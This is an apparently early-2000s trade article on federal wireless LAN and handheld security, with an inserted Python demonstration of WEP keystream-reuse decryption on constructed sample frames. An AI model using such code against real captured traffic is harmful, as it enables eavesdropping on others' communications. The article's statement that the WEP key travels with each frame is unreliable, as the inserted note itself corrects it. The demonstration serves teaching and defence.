Mobilizing security

Growth of wireless applications drives need for greater protection

More and more federal agencies are cutting the wires that tether people to desktop PCs. Thanks to wireless networking, laptop users can now roam the office without losing their connection to the local-area network. Outside the office, workers can use wireless phones and handheld devices to tap into the Internet.

But along with the convenience and flexibility of wireless networking come concerns about security. Addressing those concerns requires an end-to-end approach that takes into account the security of the portable device, the wireless transmission of data and the handling of data back at the office.

In the government, security issues are governed by an edict that requires certain agencies and departments using wireless solutions to plug their security holes by 2002.

The criteria for evaluating security for information deemed sensitive but unclassified are specified in Federal Information Processing Standard Publication 140-1 from the National Institute of Standards and Technology. Many vendors are rushing to obtain FIPS 140-1 certification for their products so they can bid on government contracts.

The security of wireless LANs, which use internal gateways or access points, is generally considered easier to control than the security of wireless handheld devices, which rely on the services of an outside telecommunications company.

On the other hand, the limited functionality of most wireless devices today makes them less vulnerable to security breaches by malicious hackers, said Chris Klaus, founder and chief technology officer at Internet Security Systems Inc. He likens those devices to "old DOS PCs, which were very secure because they had no services running." Later, the Microsoft Corp. Windows operating system added services to PCs that provided openings for hackers, he said.

Others see similarities in the security of wireless LANs and the networks handheld devices use. Access control is "the foundation of security for both technologies," said John Muir, president of the North American division of Pointsec Mobile Technologies Inc.

Most attempts to address wireless security focus on data while it is in transit between sender and receiver. At Pointsec, "we deal with data the other 98 percent of the time, when it is resting on the mobile device," Muir said.

"The problem is that the portable client device may reside outside the firewall perimeter," he said. "Organizations are concerned about the privacy of the data stored on the device and the access that a device may provide to internal systems."

Several agencies, including the departments of Defense and Justice, are evaluating or deploying Pointsec technology, Muir said.

The company's technology is designed to prevent a portable device from being used by anyone other than the authorized user. It uses password-based access control and encrypts data in the portable device with "hard" (128-bit or greater) encryption algorithms, Muir said. Pointsec offers access-control software for both wireless LAN-enabled notebooks and handheld devices, but hard encryption is currently available only for notebooks, which have fewer processing limitations.

The Office of Naval Research recently selected Pointsec 4.0 to secure mission-critical data on laptop and desktop computers used by dispersed ground forces who connect wirelessly to joint forces ashore and at sea. Officials are using the technology as part of their Extending the Littoral Battlespace Advanced Concept Technology Demonstration.

"An important part of the approval process at the Navy was the user-friendliness of the solution," Muir said. "Our encryption occurs on the fly, so users don't even know it is there. That was very important to the Navy."

Navy officials are also interested in how Pointsec technology can make the access controls on Palm Inc. devices as easy to use as possible. Pointsec's PicturePIN uses a series of symbol displays that must be tapped in the right order for access to be granted.

"Essentially, the user remembers his password by making up a story: 'A man walked on a beach carrying a newspaper,'" Muir said. The user "taps the symbol of a man, a beach ball and a newspaper in the proper order. The order of the symbols is scrambled with each log-in to prevent 'over the shoulder' hacking. Without the story, the symbols are meaningless."

To George Brostoff, president of Ensure Technologies Inc., the problem with most access-control schemes is the lack of attentiveness by users after they've logged in. Users of wireless laptops are often oblivious to the threat posed by leaving a connected computer unattended—especially inside the office.

"Study after study has shown that the biggest security threat is from people inside the organization, not outside," Brostoff said.

With Ensure's XyLoc, a small radio "lock" device is attached to a laptop and the authorized user is issued a key card or key fob. When the user approaches the laptop, the card or fob communicates with the device, which grants access to the computer after authenticating the user's identity. If the user steps away from the computer, access is automatically denied. The user "doesn't have to log in each time he wants to use the wireless device," Brostoff said. A version of XyLoc for handheld devices is in the works.

Securing access, of course, is only one part of the security puzzle. In February, a study conducted at the University of California, Berkeley, confirmed what Jim Gemmel, senior signals analyst for systems integrator CACI International Inc., and others have been saying about wireless security for more than a year: Data traffic is susceptible to interception and eavesdropping.

"The wireless modems used with [personal digital assistants] and other mobile devices operate in the 2.46 GHz range and provide absolutely no security," Gemmel said. "Wireless LANs using the 802.11b Ethernet standard offer Wired Equivalent Privacy amounting to a 40-bit encryption scheme. Not only is the encryption level vulnerable, the encryption key is sent with each frame, so by examining each packet, a hacker can reconstruct the encryption key and decrypt the traffic. That's what they did at UC Berkeley."
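The keystream-reuse weakness behind the Berkeley finding, shown as an added example that is not part of this article and not the UC Berkeley team's code. In WEP the value that travels in the clear at the front of every frame is the 24-bit initialization vector (IV); the shared key is never transmitted but is simply appended to the IV to form the per-packet RC4 key, so any two frames that carry the same IV are encrypted under the same keystream. The Python below implements RC4 and a simplified WEP frame layout with a constructed 40-bit key, a constructed reused IV and constructed payloads (nothing here is a real credential or captured traffic), and then plays the eavesdropper: given one frame whose plaintext is predictable (protocol headers such as the LLC/SNAP prefix used below), it decrypts a second frame with the same IV without ever learning the key. The final function goes slightly beyond the article by giving the birthday bound on how many frames a busy network sends before an IV repeats; that figure is the example's own, not one the article states.

```python
"""Added example (not from the article or the UC Berkeley study): minimal RC4
plus a WEP-style frame layout, used to show why an eavesdropper who only
captures frames can decrypt them once an IV repeats.

Everything here is constructed for the demonstration: the 40-bit key, the IVs
and the frame payloads are arbitrary sample values, not real credentials or
captured traffic.
"""
import math
import struct
import zlib

IV_LEN = 3  # WEP sends a 24-bit IV in the clear at the front of each frame


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by the PRGA; returns `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """WEP's integrity check value: a plain CRC-32 over the payload."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (cleartext) || RC4(IV || shared_key)(payload || ICV)."""
    assert len(iv) == IV_LEN and len(shared_key) in (5, 13)
    plaintext = payload + icv(payload)
    return iv + xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: rebuild the per-packet key from the cleartext IV."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    plaintext = xor_bytes(body, rc4_keystream(iv + shared_key, len(body)))
    payload, tag = plaintext[:-4], plaintext[-4:]
    if icv(payload) != tag:
        raise ValueError("ICV mismatch")
    return payload


def eavesdrop_recover(frame_known: bytes, known_payload: bytes, frame_target: bytes) -> bytes:
    """Attacker with no key. If two captured frames carry the same IV they were
    encrypted under the same keystream, so C1 XOR P1 yields the keystream and
    C2 XOR keystream yields as much of P2 as P1 (plus its ICV) was long."""
    iv1, c1 = frame_known[:IV_LEN], frame_known[IV_LEN:]
    iv2, c2 = frame_target[:IV_LEN], frame_target[IV_LEN:]
    if iv1 != iv2:
        raise ValueError("IVs differ: different keystreams, nothing to reuse")
    keystream = xor_bytes(c1, known_payload + icv(known_payload))
    return xor_bytes(c2, keystream)


def frames_until_iv_collision(probability: float, iv_bits: int = 24) -> int:
    """Birthday bound: frames needed before some IV repeats with the given
    probability when IVs are drawn at random (sequential IVs wrap after
    2**iv_bits frames and restart from the same value on every reset).
    This is the example's own extension, not a figure from the article."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


# Constructed sample data (not real credentials or captured traffic).
SHARED_KEY = bytes.fromhex("0102030405")       # arbitrary 40-bit WEP key
REUSED_IV = bytes.fromhex("0a0b0c")            # arbitrary IV used twice
# LLC/SNAP header for ARP followed by padding: headers like this are
# predictable, which is where an eavesdropper's known plaintext comes from.
KNOWN_PAYLOAD = bytes.fromhex("aaaa030000000806") + b"\x00" * 40
TARGET_PAYLOAD = bytes.fromhex("aaaa030000000800") + b"GET /payroll?user=admin HTTP/1.0"


def demo() -> bytes:
    """Encrypt two frames under the same IV, then recover the second without the key."""
    frame1 = wep_encrypt(SHARED_KEY, REUSED_IV, KNOWN_PAYLOAD)
    frame2 = wep_encrypt(SHARED_KEY, REUSED_IV, TARGET_PAYLOAD)  # same IV again
    assert wep_decrypt(SHARED_KEY, frame1) == KNOWN_PAYLOAD   # receiver still works
    recovered = eavesdrop_recover(frame1, KNOWN_PAYLOAD, frame2)
    return recovered[: len(TARGET_PAYLOAD)]


if __name__ == "__main__":
    print("IV visible in every frame:", wep_encrypt(SHARED_KEY, REUSED_IV, b"x")[:IV_LEN].hex())
    print("recovered without the key:", demo())
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_collision(0.5))
```

The recovery needs only two captured frames and one guessable plaintext; with random IVs a 24-bit space repeats with even odds after a few thousand frames, and with counter-based IVs that restart at zero every time a card is reset the repeats come much sooner. Recovering the shared key itself takes further statistical work that this example does not perform.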

And encryption can only work if it is enabled on the wireless system itself, which is often not the case, according to Klaus. He said that because wireless LAN devices are inexpensive—with base stations costing less than $800 and wireless notebook PC Cards costing less than $125—many organizations are deploying the technology without consulting security experts.

In many cases, Klaus said, users don't change the default administrative passwords on their wireless LAN access points, providing ready access to an organization's LANs by "drive-by hackers."

"We have literally driven through the business districts of many major cities with a laptop and wireless PC Card and gotten access to many LANs belonging to businesses occupying offices in the buildings on either side of the street," Klaus said.

Although he is dubious about the efficacy of a drive-by approach given the limited signaling distances of most wireless LAN transceivers, Robert Manchise, chief scientist for integrator Anteon Corp., agrees that users can compromise their networks by deploying wireless technology on their own. "Most users simply aren't thinking about the security ramifications, and integrators often have little input," he said.

Improving wireless security will require the efforts of vendors, customers and integrators, Manchise and others say. Vendors must make their products more secure out of the box. Customers need to be more aware of security issues. And integrators need to become involved in designing networks with security technologies to protect against wireless intruders.

Mobile-device manufacturers are beginning to make their products more secure. John Inkley, manager of federal sales at Palm, said that although "we don't ship the product with a security or encryption technology, custom key encryption solutions are available from our partners." He said those technologies "are adequate for most of our government clients. In classified data environments, no one uses the public airwaves to transmit data."

Wireless LAN vendors such as 3Com Corp. are beginning to make security "a mantra," according to John Temple, territory manager for civilian and federal sales with 3Com's offices in Tysons Corner, Va. He said 3Com's list of wireless "wins" in government has been growing and includes Justice's Executive Office for Immigration Review, the U.S. Probationary Courts in Chicago and the Senate. 3Com's access-point product requires the user to change the administrative password as one of the first steps, eliminating a common hacking problem. The products are also designed to be deployed within the secure environment of 3Com's wired network technologies, Temple said.

In many ways, wireless security is similar to wired Ethernet security, Klaus said. "Ethernet itself is not very secure. You need to take measures to lock it down. Wireless merely increases the problem. Since traffic is broadcast through the air, you don't need to hijack a connection.

"Companies are going to need to build security into their wired networks and applications to cope with wireless. And they are going to need intrusion-detection capabilities to look for bad activity on an ongoing basis."

Toigo is an independent consultant and author specializing in business automation issues. He can be reached via his Web site at www.toigoproductions.com.